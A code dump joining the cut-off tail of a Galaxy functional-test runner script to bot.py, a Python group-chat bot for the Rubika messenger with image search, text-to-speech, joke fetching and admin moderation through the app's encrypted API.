# and reload the app's toolbox.
relative_migrated_tool_panel_config = os.path.join( app.config.root, migrated_tool_panel_config )
if relative_migrated_tool_panel_config in tool_configs:
tool_configs.remove( relative_migrated_tool_panel_config )
for installed_tool_panel_config in installed_tool_panel_configs:
tool_configs.append( installed_tool_panel_config )
app.toolbox = tools.ToolBox( tool_configs, app.config.tool_path, app )
success = _run_functional_test( testing_shed_tools=True )
try:
os.unlink( tmp_tool_panel_conf )
except:
log.info( "Unable to remove temporary file: %s" % tmp_tool_panel_conf )
try:
os.unlink( galaxy_tool_shed_test_file )
except:
log.info( "Unable to remove file: %s" % galaxy_tool_shed_test_file )
else:
if galaxy_test_file_dir:
os.environ[ 'GALAXY_TEST_FILE_DIR' ] = galaxy_test_file_dir
success = _run_functional_test( )
except:
log.exception( "Failure running tests" )
log.info( "Shutting down" )
# ---- Tear down -----------------------------------------------------------
if server:
log.info( "Shutting down embedded web server" )
server.server_close()
server = None
log.info( "Embedded web server stopped" )
if app:
log.info( "Shutting down app" )
app.shutdown()
app = None
log.info( "Embedded Universe application stopped" )
try:
if os.path.exists( tempdir ) and 'GALAXY_TEST_NO_CLEANUP' not in os.environ:
log.info( "Cleaning up temporary files in %s" % tempdir )
shutil.rmtree( tempdir )
else:
log.info( "GALAXY_TEST_NO_CLEANUP is on. Temporary files in %s" % tempdir )
except:
pass
if success:
return 0
else:
return 1
def __check_arg( name, param=False ):
try:
index = sys.argv.index( name )
del sys.argv[ index ]
if param:
ret_val = sys.argv[ index ]
del sys.argv[ index ]
else:
ret_val = True
except ValueError:
ret_val = False
return ret_val
if __name__ == "__main__":
sys.exit( main() )
|
bot.py
|
import asyncio
import base64
import concurrent.futures
import datetime
import glob
import json
import math
import os
import pathlib
import random
import sys
import time
from json import dumps, loads
from random import randint
import re
from re import findall
import requests
import urllib3
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
from requests import post
from googletrans import Translator
import io
from PIL import Image , ImageFont, ImageDraw
import arabic_reshaper
from bidi.algorithm import get_display
from mutagen.mp3 import MP3
from gtts import gTTS
from threading import Thread
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
from difflib import SequenceMatcher
def similar(a, b):
return SequenceMatcher(None, a, b).ratio()
#lisence by bahman ahmadi this classes
#this classes opened sourse and free
class encryption:
def __init__(self, auth):
self.key = bytearray(self.secret(auth), "UTF-8")
self.iv = bytearray.fromhex('00000000000000000000000000000000')
def replaceCharAt(self, e, t, i):
return e[0:t] + i + e[t + len(i):]
def secret(self, e):
t = e[0:8]
i = e[8:16]
n = e[16:24] + t + e[24:32] + i
s = 0
while s < len(n):
e = n[s]
if e >= '0' and e <= '9':
t = chr((ord(e[0]) - ord('0') + 5) % 10 + ord('0'))
n = self.replaceCharAt(n, s, t)
else:
t = chr((ord(e[0]) - ord('a') + 9) % 26 + ord('a'))
n = self.replaceCharAt(n, s, t)
s += 1
return n
def encrypt(self, text):
raw = pad(text.encode('UTF-8'), AES.block_size)
aes = AES.new(self.key, AES.MODE_CBC, self.iv)
enc = aes.encrypt(raw)
result = base64.b64encode(enc).decode('UTF-8')
return result
def decrypt(self, text):
aes = AES.new(self.key, AES.MODE_CBC, self.iv)
dec = aes.decrypt(base64.urlsafe_b64decode(text.encode('UTF-8')))
result = unpad(dec, AES.block_size).decode('UTF-8')
return result
class Bot:
def __init__(self, auth):
self.auth = auth
self.enc = encryption(auth)
def sendMessage(self, chat_id, text, message_id=None):
if message_id == None:
t = False
while t == False:
try:
p = post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,900000)}",
"text":text,
"reply_to_message_id":message_id
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c17.iranlms.ir/")
p = loads(self.enc.decrypt(p.json()["data_enc"]))
t = True
except:
t = False
return p
else:
t = False
while t == False:
try:
p = post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,900000)}",
"text":text,
"reply_to_message_id":message_id
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c17.iranlms.ir/")
p = loads(self.enc.decrypt(p.json()["data_enc"]))
t = True
except:
t = False
return p
def deleteMessages(self, chat_id, message_ids):
return post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"deleteMessages",
"input":{
"object_guid":chat_id,
"message_ids":message_ids,
"type":"Global"
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c66.iranlms.ir/")
def requestFile(self, name, size , mime):
o = ''
while str(o) != '<Response [200]>':
o = post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"requestSendFile",
"input":{
"file_name":name,
"size":size,
"mime":mime
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c66.iranlms.ir/")
try:
k = loads(self.enc.decrypt(o.json()["data_enc"]))
if k['status'] != 'OK' or k['status_det'] != 'OK':
o = '502'
except:
o = '502'
return k['data']
def fileUpload(self, bytef ,hash_send ,file_id ,url):
if len(bytef) <= 131072:
h = {
'auth':self.auth,
'chunk-size':str(len(bytef)),
'file-id':str(file_id),
'access-hash-send':hash_send,
'total-part':str(1),
'part-number':str(1)
}
t = False
while t == False:
try:
j = post(data=bytef,url=url,headers=h).text
j = loads(j)['data']['access_hash_rec']
t = True
except:
t = False
return j
else:
t = len(bytef) / 131072
t += 1
t = random._floor(t)
for i in range(1,t+1):
if i != t:
k = i - 1
k = k * 131072
t2 = False
while t2 == False:
try:
o = post(data=bytef[k:k + 131072],url=url,headers={
'auth':self.auth,
'chunk-size':str(131072),
'file-id':file_id,
'access-hash-send':hash_send,
'total-part':str(t),
'part-number':str(i)
}).text
o = loads(o)['data']
t2 = True
except:
t2 = False
j = k + 131072
j = round(j / 1024)
j2 = round(len(bytef) / 1024)
print(str(j) + 'kb / ' + str(j2) + ' kb')
else:
k = i - 1
k = k * 131072
t2 = False
while t2 == False:
try:
p = post(data=bytef[k:],url=url,headers={
'auth':self.auth,
'chunk-size':str(len(bytef[k:])),
'file-id':file_id,
'access-hash-send':hash_send,
'total-part':str(t),
'part-number':str(i)
}).text
p = loads(p)['data']['access_hash_rec']
t2 = True
except:
t2 = False
j2 = round(len(bytef) / 1024)
print(str(j2) + 'kb / ' + str(j2) + ' kb')
return p
def sendFile(self, chat_id, file_id , mime , dc_id, access_hash_rec, file_name, size, text=None, message_id=None):
if text == None:
if message_id == None:
t = False
while t == False:
try:
p = loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,900000)}",
"file_inline":{
"dc_id":str(dc_id),
"file_id":str(file_id),
"type":"File",
"file_name":file_name,
"size":size,
"mime":mime,
"access_hash_rec":access_hash_rec
}
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc']))
t = True
except:
t = False
return p
else:
return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,900000)}",
"reply_to_message_id":message_id,
"file_inline":{
"dc_id":str(dc_id),
"file_id":str(file_id),
"type":"File",
"file_name":file_name,
"size":size,
"mime":mime,
"access_hash_rec":access_hash_rec
}
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc']))
else:
if message_id == None:
return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,900000)}",
"text":text,
"file_inline":{
"dc_id":str(dc_id),
"file_id":str(file_id),
"type":"File",
"file_name":file_name,
"size":size,
"mime":mime,
"access_hash_rec":access_hash_rec
}
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc']))
else:
return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,900000)}",
"text":text,
"reply_to_message_id":message_id,
"file_inline":{
"dc_id":str(dc_id),
"file_id":str(file_id),
"type":"File",
"file_name":file_name,
"size":size,
"mime":mime,
"access_hash_rec":access_hash_rec
}
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc']))
def sendImage(self, chat_id, file_id , mime , dc_id, access_hash_rec, file_name, size, thumb_inline , width , height, text=None, message_id=None):
if text == None:
if message_id == None:
t = False
while t == False:
try:
p = loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,900000)}",
"file_inline":{
"dc_id":str(dc_id),
"file_id":str(file_id),
"type":"Image",
"file_name":file_name,
"size":size,
"mime":mime,
"access_hash_rec":access_hash_rec,
'thumb_inline':thumb_inline,
'width':width,
'height':height
}
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc']))
t = True
except:
t = False
return p
else:
return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,900000)}",
"reply_to_message_id":message_id,
"file_inline":{
"dc_id":str(dc_id),
"file_id":str(file_id),
"type":"Image",
"file_name":file_name,
"size":size,
"mime":mime,
"access_hash_rec":access_hash_rec,
'thumb_inline':thumb_inline,
'width':width,
'height':height
}
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc']))
else:
if message_id == None:
return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,900000)}",
"text":text,
"file_inline":{
"dc_id":str(dc_id),
"file_id":str(file_id),
"type":"Image",
"file_name":file_name,
"size":size,
"mime":mime,
"access_hash_rec":access_hash_rec,
'thumb_inline':thumb_inline,
'width':width,
'height':height
}
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc']))
else:
return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,900000)}",
"text":text,
"reply_to_message_id":message_id,
"file_inline":{
"dc_id":str(dc_id),
"file_id":str(file_id),
"type":"Image",
"file_name":file_name,
"size":size,
"mime":mime,
"access_hash_rec":access_hash_rec,
'thumb_inline':thumb_inline,
'width':width,
'height':height
}
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc']))
def sendVoice(self, chat_id, file_id , mime , dc_id, access_hash_rec, file_name, size, duration, text=None, message_id=None):
if text == None:
if message_id == None:
t = False
while t == False:
try:
p = loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,900000)}",
"file_inline":{
"dc_id":str(dc_id),
"file_id":str(file_id),
"type":"Voice",
"file_name":file_name,
"size":size,
"mime":mime,
"access_hash_rec":access_hash_rec,
'time':duration,
}
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc']))
t = True
except:
t = False
return p
else:
return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,900000)}",
"reply_to_message_id":message_id,
"file_inline":{
"dc_id":str(dc_id),
"file_id":str(file_id),
"type":"Voice",
"file_name":file_name,
"size":size,
"mime":mime,
"access_hash_rec":access_hash_rec,
'time':duration,
}
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc']))
else:
if message_id == None:
return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,900000)}",
"text":text,
"file_inline":{
"dc_id":str(dc_id),
"file_id":str(file_id),
"type":"Voice",
"file_name":file_name,
"size":size,
"mime":mime,
"access_hash_rec":access_hash_rec,
'time':duration,
}
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc']))
else:
return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,900000)}",
"text":text,
"reply_to_message_id":message_id,
"file_inline":{
"dc_id":str(dc_id),
"file_id":str(file_id),
"type":"Voice",
"file_name":file_name,
"size":size,
"mime":mime,
"access_hash_rec":access_hash_rec,
'time':duration,
}
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc']))
def getUserInfo(self, chat_id):
return loads(self.enc.decrypt(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"getUserInfo",
"input":{
"user_guid":chat_id
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c37.iranlms.ir/").json()["data_enc"]))
def getMessages(self, chat_id,min_id):
return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"getMessagesInterval",
"input":{
"object_guid":chat_id,
"middle_message_id":min_id
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c67.iranlms.ir/").json().get("data_enc"))).get("data").get("messages")
def getInfoByUsername(self, username):
''' username should be without @ '''
return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"getObjectByUsername",
"input":{
"username":username
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c23.iranlms.ir/").json().get("data_enc")))
def banGroupMember(self, chat_id, user_id):
return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"banGroupMember",
"input":{
"group_guid": chat_id,
"member_guid": user_id,
"action":"Set"
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c21.iranlms.ir/")
def invite(self, chat_id, user_ids):
return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"addGroupMembers",
"input":{
"group_guid": chat_id,
"member_guids": user_ids
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c22.iranlms.ir/")
def getGroupAdmins(self, chat_id):
t = False
while t == False:
try:
p = post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"client":{
"app_name":"Main",
"app_version":"2.9.5",
"lang_code":"fa",
"package":"ir.resaneh1.iptv",
"platform":"Android"
},
"input":{
"group_guid":chat_id
},
"method":"getGroupAdminMembers"
}))},url="https://messengerg2c22.iranlms.ir/")
p = loads(self.enc.decrypt(p.json().get("data_enc")))
t = True
except:
t = False
return p
def getMessagesInfo(self, chat_id, message_ids):
return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"getMessagesByID",
"input":{
"object_guid": chat_id,
"message_ids": message_ids
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))}, url="https://messengerg2c24.iranlms.ir/").json()["data_enc"])).get("data").get("messages")
def setMembersAccess(self, chat_id, access_list):
return post(json={
"api_version": "4",
"auth": self.auth,
"client": {
"app_name": "Main",
"app_version": "2.9.5",
"lang_code": "fa",
"package": "ir.resaneh1.iptv",
"platform": "Android"
},
"data_enc": self.enc.encrypt(dumps({
"access_list": access_list,
"group_guid": chat_id
})),
"method": "setGroupDefaultAccess"
}, url="https://messengerg2c24.iranlms.ir/")
def getGroupInfo(self, chat_id):
return loads(self.enc.decrypt(post(
json={
"api_version":"5",
"auth": self.auth,
"data_enc": self.enc.encrypt(dumps({
"method":"getGroupInfo",
"input":{
"group_guid": chat_id,
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))}, url="https://messengerg2c24.iranlms.ir/").json()["data_enc"]))
def get_updates_all_chats(self):
t = False
while t == False:
try:
time_stamp = str(random._floor(datetime.datetime.today().timestamp()) - 200)
p = post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"getChatsUpdates",
"input":{
"state":time_stamp,
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c67.iranlms.ir/")
p = loads(self.enc.decrypt(p.json().get("data_enc"))).get("data").get("chats")
t = True
except:
t = False
return p
def get_updates_chat(self, chat_id):
time_stamp = str(random._floor(datetime.datetime.today().timestamp()) - 200)
return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"getMessagesUpdates",
"input":{
"object_guid":chat_id,
"state":time_stamp
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c67.iranlms.ir/").json().get("data_enc"))).get("data").get("updated_messages")
def my_sticker_set(self):
time_stamp = str(random._floor(datetime.datetime.today().timestamp()) - 200)
return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"getMyStickerSets",
"input":{},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c67.iranlms.ir/").json().get("data_enc"))).get("data")
def getThumbInline(self,image_bytes:bytes):
im = Image.open(io.BytesIO(image_bytes))
width, height = im.size
if height > width:
new_height = 40
new_width = round(new_height * width / height)
else:
new_width = 40
new_height = round(new_width * height / width)
im = im.resize((new_width, new_height), Image.ANTIALIAS)
changed_image = io.BytesIO()
im.save(changed_image, format='PNG')
changed_image = changed_image.getvalue()
return base64.b64encode(changed_image)
def getImageSize(self,image_bytes:bytes):
im = Image.open(io.BytesIO(image_bytes))
width, height = im.size
return width , height
def hex_to_rgb(self,value):
value = value.lstrip('#')
lv = len(value)
return tuple(int(value[i:i + lv // 3], 16) for i in range(0, lv, lv // 3))
def write_text_image(self,text:str,bc_color:str='yellow',size:int=40,color='#3d3d3d',x=50,y=100):
try:
file_name = 'image/'+ bc_color +'.jpg'
image = Image.open(file_name)
size = int(size)
font = ImageFont.truetype('Vazir-Regular.ttf', size, encoding='unic')
draw = ImageDraw.Draw(image)
reshaped_text = arabic_reshaper.reshape(text) # correct its shape
changed_image = io.BytesIO()
if color.startswith('#') and len(color) < 8:
color = self.hex_to_rgb(color)
draw.text((x, y), reshaped_text,color, font = font)
image.save(changed_image, format='PNG')
changed_image = changed_image.getvalue()
return changed_image
elif color.startswith('(') and len(color) < 14 and color.count(',') == 2:
color = color.replace('(', '').replace(')', '')
list_c = color.split(',')
list_c2 = []
for i in list_c:
list_c2.append(int(i))
color = tuple(list_c2)
draw.text((x, y), bidi_text,color, font = font)
image.save(changed_image, format='PNG')
changed_image = changed_image.getvalue()
return changed_image
else:
return 'err'
except:
return 'err'
def hasInsult(msg):
swData = [False,None]
for i in open("dontReadMe.txt").read().split("\n"):
if i in msg:
swData = [True, i]
break
else: continue
return swData
def hasAds(msg):
links = list(map(lambda ID: ID.strip()[1:],findall("@[\w|_|\d]+", msg))) + list(map(lambda link:link.split("/")[-1],findall("rubika\.ir/\w+",msg)))
joincORjoing = "joing" in msg or "joinc" in msg
if joincORjoing: return joincORjoing
else:
for link in links:
try:
Type = bot.getInfoByUsername(link)["data"]["chat"]["abs_object"]["type"]
if Type == "Channel":
return True
except KeyError: return False
def search_i(text,chat,bot):
try:
search = text[11:-1]
if hasInsult(search)[0] == False and chat['abs_object']['type'] == 'Group':
bot.sendMessage(chat['object_guid'], 'نتایج کامل به زودی به پیوی شما ارسال میشوند', chat['last_message']['message_id'])
jd = json.loads(requests.get('https://zarebin.ir/api/image/?q=' + search + '&chips=&page=1').text)
jd = jd['results']
a = 0
for j in jd:
if a <= 8:
try:
res = requests.get(j['image_link'])
if res.status_code == 200 and res.content != b'' and j['cdn_thumbnail'] != '':
thumb = str(j['cdn_thumbnail'])
thumb = thumb.split('data:image/')[1]
thumb = thumb.split(';')[0]
if thumb == 'png':
b2 = res.content
width, height = bot.getImageSize(b2)
tx = bot.requestFile(j['title'] + '.png', len(b2), 'png')
access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url'])
bot.sendImage(chat['last_message']['author_object_guid'] ,tx['id'] , 'png', tx['dc_id'] , access, j['title'] + '.png', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, j['title'])
print('sended file')
elif thumb == 'webp':
b2 = res.content
width, height = bot.getImageSize(b2)
tx = bot.requestFile(j['title'] + '.webp', len(b2), 'webp')
access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url'])
bot.sendImage(chat['last_message']['author_object_guid'] ,tx['id'] , 'webp', tx['dc_id'] , access, j['title'] + '.webp', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, j['title'])
print('sended file')
else:
b2 = res.content
width, height = bot.getImageSize(b2)
tx = bot.requestFile(j['title'] + '.jpg', len(b2), 'jpg')
access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url'])
bot.sendImage(chat['last_message']['author_object_guid'] ,tx['id'] , 'jpg', tx['dc_id'] , access, j['title'] + '.jpg', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, j['title'])
print('sended file')
a += 1
except:
print('image error')
else:
break
elif chat['abs_object']['type'] == 'User':
bot.sendMessage(chat['object_guid'], 'در حال یافتن کمی صبور باشید...', chat['last_message']['message_id'])
print('search image')
jd = json.loads(requests.get('https://zarebin.ir/api/image/?q=' + search + '&chips=&page=1').text)
jd = jd['results']
a = 0
for j in jd:
if a < 10:
try:
res = requests.get(j['image_link'])
if res.status_code == 200 and res.content != b'' and j['cdn_thumbnail'] != '' and j['cdn_thumbnail'].startswith('data:image'):
thumb = str(j['cdn_thumbnail'])
thumb = thumb.split('data:image/')[1]
thumb = thumb.split(';')[0]
if thumb == 'png':
b2 = res.content
width, height = bot.getImageSize(b2)
tx = bot.requestFile(j['title'] + '.png', len(b2), 'png')
access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url'])
bot.sendImage(chat['object_guid'] ,tx['id'] , 'png', tx['dc_id'] , access, j['title'] + '.png', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, j['title'], chat['last_message']['message_id'])
print('sended file')
elif thumb == 'webp':
b2 = res.content
width, height = bot.getImageSize(b2)
tx = bot.requestFile(j['title'] + '.webp', len(b2), 'webp')
access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url'])
bot.sendImage(chat['object_guid'] ,tx['id'] , 'webp', tx['dc_id'] , access, j['title'] + '.webp', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, j['title'], chat['last_message']['message_id'])
print('sended file')
else:
b2 = res.content
tx = bot.requestFile(j['title'] + '.jpg', len(b2), 'jpg')
access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url'])
width, height = bot.getImageSize(b2)
bot.sendImage(chat['object_guid'] ,tx['id'] , 'jpg', tx['dc_id'] , access, j['title'] + '.jpg', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, j['title'], chat['last_message']['message_id'])
print('sended file')
a += 1
except:
print('image erorr')
return True
except:
print('image search err')
return False
def write_image(text,chat,bot):
try:
c_id = chat['last_message']['message_id']
msg_data = bot.getMessagesInfo(chat['object_guid'], [c_id])
msg_data = msg_data[0]
if 'reply_to_message_id' in msg_data.keys():
msg_data = bot.getMessagesInfo(chat['object_guid'], [msg_data['reply_to_message_id']])[0]
if 'text' in msg_data.keys() and msg_data['text'].strip() != '':
txt_xt = msg_data['text']
paramiters = text[8:-1]
paramiters = paramiters.split(':')
if len(paramiters) == 5:
b2 = bot.write_text_image(txt_xt,paramiters[0],int(paramiters[1]),str(paramiters[2]),int(paramiters[3]),int(paramiters[4]))
tx = bot.requestFile('code_image.png', len(b2), 'png')
access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url'])
width, height = bot.getImageSize(b2)
bot.sendImage(chat['object_guid'] ,tx['id'] , 'png', tx['dc_id'] , access, 'code_image.png', len(b2) , str(bot.getThumbInline(b2))[2:-1] , width, height ,message_id= c_id)
print('sended file')
return True
return False
except:
print('server ban bug')
return False
def uesr_remove(text,chat,bot):
try:
admins = [i["member_guid"] for i in bot.getGroupAdmins(chat['object_guid'])["data"]["in_chat_members"]]
if chat['last_message']['author_object_guid'] in admins:
c_id = chat['last_message']['message_id']
msg_data = bot.getMessagesInfo(chat['object_guid'], [c_id])
msg_data = msg_data[0]
if 'reply_to_message_id' in msg_data.keys():
msg_data = bot.getMessagesInfo(chat['object_guid'], [msg_data['reply_to_message_id']])[0]
if not msg_data['author_object_guid'] in admins:
bot.banGroupMember(chat['object_guid'], msg_data['author_object_guid'])
bot.sendMessage(chat['object_guid'], 'انجام شد' , chat['last_message']['message_id'])
return True
return False
except:
print('server ban bug')
return False
def speak_after(text,chat,bot):
try:
c_id = chat['last_message']['message_id']
msg_data = bot.getMessagesInfo(chat['object_guid'], [c_id])
msg_data = msg_data[0]
if 'reply_to_message_id' in msg_data.keys():
msg_data = bot.getMessagesInfo(chat['object_guid'], [msg_data['reply_to_message_id']])[0]
if 'text' in msg_data.keys() and msg_data['text'].strip() != '':
txt_xt = msg_data['text']
speech = gTTS(txt_xt)
changed_voice = io.BytesIO()
speech.write_to_fp(changed_voice)
b2 = changed_voice.getvalue()
tx = bot.requestFile('sound.ogg', len(b2), 'sound.ogg')
access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url'])
f = io.BytesIO()
f.write(b2)
f.seek(0)
audio = MP3(f)
dur = audio.info.length
bot.sendVoice(chat['object_guid'],tx['id'] , 'ogg', tx['dc_id'] , access, 'sound.ogg', len(b2), dur * 1000 ,message_id= c_id)
print('sended voice')
return True
return False
except:
print('server gtts bug')
return False
def joker(text,chat,bot):
try:
jd = requests.get('https://api.codebazan.ir/jok/').text
bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id'])
return True
except:
print('code bz server err')
return False
def info_qroz(text,chat,bot):
try:
user_info = bot.getInfoByUsername(text[7:])
if user_info['data']['exist'] == True:
if user_info['data']['type'] == 'User':
bot.sendMessage(chat['object_guid'], 'name:\n ' + user_info['data']['user']['first_name'] + ' ' + user_info['data']['user']['last_name'] + '\n\nbio:\n ' + user_info['data']['user']['bio'] + '\n\nguid:\n ' + user_info['data']['user']['user_guid'] , chat['last_message']['message_id'])
print('sended response')
else:
bot.sendMessage(chat['object_guid'], 'کانال است' , chat['last_message']['message_id'])
print('sended response')
else:
bot.sendMessage(chat['object_guid'], 'وجود ندارد' , chat['last_message']['message_id'])
print('sended response')
return True
except:
print('server bug6')
return False
def search(text,chat,bot):
try:
search = text[9:-1]
